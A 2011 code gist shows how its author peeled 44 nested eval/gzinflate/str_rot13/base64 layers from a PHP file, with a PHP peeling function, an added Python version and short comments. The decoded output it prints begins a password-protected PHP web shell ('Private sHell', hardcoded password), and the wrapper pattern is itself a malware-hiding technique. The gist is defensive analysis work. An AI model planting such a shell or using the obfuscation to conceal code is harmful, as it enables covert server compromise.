@koto
Created September 19, 2011 22:34
Fighting inception obfuscation
<?php
// I got this file once
eval(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>
<?php
// obviously I didn't want it to eval(), so to deobfuscate it i simply did:
print(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>
and....
$ php 2.php
eval(gzinflate(str_rot13(base64_decode('HJ23juvIFlI/5w3AgN6F9N57JgPRey...59.5KB.of.code..=')
$ oh crap
-bash: oh: command not found
$ php 2.php > 3.php
$ joe 3.php
<editing...>
$ php 3.php
eval(gzinflate(str_rot13(base64_decode('HJ23juvIFlI/5w3AgN6F9N57JgPRey...59KB.of.code..=')
Friggin inceptions! There might be many of them...
<?php
// and this is how you handle this
function t($code) {
    echo "."; // just to detect how many inceptions there were
    // undo the wrapper in the order PHP would have run it: base64_decode -> str_rot13 -> gzinflate
    $code = str_rot13(base64_decode($code));
    $code = gzinflate($code);
    $m = array();
    // if the result is yet another eval(gzinflate(str_rot13(base64_decode('...')))) layer, peel it too
    if (preg_match('/str_rot13\(base64_decode\(\'(.+)\'\)/', $code, $m)) {
        return t($m[1]);
    }
    return $code;
}
$code = 'HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=';
print(t($code));
$ php deception.php | head
............................................ // 44 inceptions!
@session_start();@set_time_limit(0);@$pass = $_POST['pass'];$chk_login = true;$password = "tampan";if($pass == $password){$_SESSION['nst'] = "$pass";}if($chk_login == true){if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password){die("<title>.::[ Yogyacarderlink Area ]::.</title><body style=margin:0px;><table border=0 cellpadding=0 cellspacing=0 width=100% height=100% bgcolor=black><tr><td valign=middle align=center><table cellpadding=2 cellspacing=2 width=100 bgcolor=black style='border:1px solid #FFFF00;'><tr><td><table width=100 bgcolor=black style='border:1px dashed #FFFF00;'><tr><td><form method=post><font size=1 face=verdana color=white><b><center>-:: Wellcome to Private sHell ::-</center></b><hr style='border:1px dashed #FFFF00;'><center><input type=password name=pass size=30><br><br><input type=submit value=GO style='background-color: #000000; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: #CCCCCC; border-right-color: #999999; border-bottom-color: #999999; border-left-color: #CCCCCC; color: #FFFFFF;'></center></form><b>Host :</b> ".$_SERVER["HTTP_HOST"]."<br><b>IP :</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br><b>Your IP :</b> ".$_SERVER["REMOTE_ADDR"]."</font></td></tr></table></tr></td></table></td></tr></table></body>");}}$language='eng';error_reporting(0);set_magic_quotes_runtime(0);@set_time_limit(0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);$safe_mode = @ini_get('safe_mode');$version = "denzjhoena Private sHell";if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;$_SERVER = &$HTTP_SERVER_VARS;}if (@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}foreach ($_SERVER as $k=>$v){$_SERVER[$k] = stripslashes($v);}}
$head = '
<html>
<head>
<title>[ ? ] denzjhoena shell [ ? ]</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>
tr {
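The same layer-peeling loop in Python, as an added example that is not part of the gist: it mirrors PHP's raw-DEFLATE `gzinflate` and byte-level `str_rot13`, caps the number of layers so a crafted sample cannot loop forever, and reports how many layers were removed. `wrap` is a constructed helper that builds a harmless multi-layer stand-in so the script runs offline without a real sample.

```python
import base64
import re
import zlib

# One wrapper layer as it appears in the gist:
# eval(gzinflate(str_rot13(base64_decode('<base64 blob>'))));
LAYER_RE = re.compile(r"str_rot13\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")

# PHP str_rot13 works on raw bytes: ASCII letters rotate, everything else passes through
_ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)

def str_rot13(data: bytes) -> bytes:
    return data.translate(_ROT13)

def gzinflate(data: bytes) -> bytes:
    # PHP gzinflate() reads a raw DEFLATE stream (no zlib/gzip header): negative wbits in zlib
    return zlib.decompress(data, -15)

def peel(source: str, max_layers: int = 1000) -> tuple[str, int]:
    """Strip nested layers from PHP source; return (innermost code, layers removed).
    Decode order mirrors what PHP would execute: base64_decode -> str_rot13 -> gzinflate.
    The cap stops a crafted or self-referencing sample from looping forever."""
    layers, code = 0, source
    while (m := LAYER_RE.search(code)) is not None:
        if layers >= max_layers:
            raise RuntimeError(f"more than {max_layers} layers, giving up")
        layers += 1
        code = gzinflate(str_rot13(base64.b64decode(m.group(1)))).decode("latin-1")
    return code, layers

def wrap(code: str, layers: int) -> str:
    """Constructed helper (not from the gist): re-apply the same wrapper `layers` times
    so the example runs offline on a harmless stand-in rather than a real sample."""
    payload = code
    for _ in range(layers):
        deflater = zlib.compressobj(wbits=-15)
        raw = deflater.compress(payload.encode("latin-1")) + deflater.flush()
        blob = base64.b64encode(str_rot13(raw)).decode("ascii")
        payload = f"eval(gzinflate(str_rot13(base64_decode('{blob}'))));"
    return payload

if __name__ == "__main__":
    sample = wrap('<?php echo "harmless stand-in"; ?>', 44)  # constructed, 44 deep like the gist
    inner, count = peel(sample)
    print(f"{count} layers removed -> {inner}")
```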
@koto

koto commented Sep 19, 2011

Of course, under 44 layers of obfuscation there was a PHP shell script...

@damianb
damianb commented Sep 19, 2011

so, that's 44 layers total, not including the two attempts at the beginning?

also, they didn't try to change the obfuscation methods throughout? that's surprising.

@koto

koto commented Sep 20, 2011

yeah, 44 in total, all steps were the same.
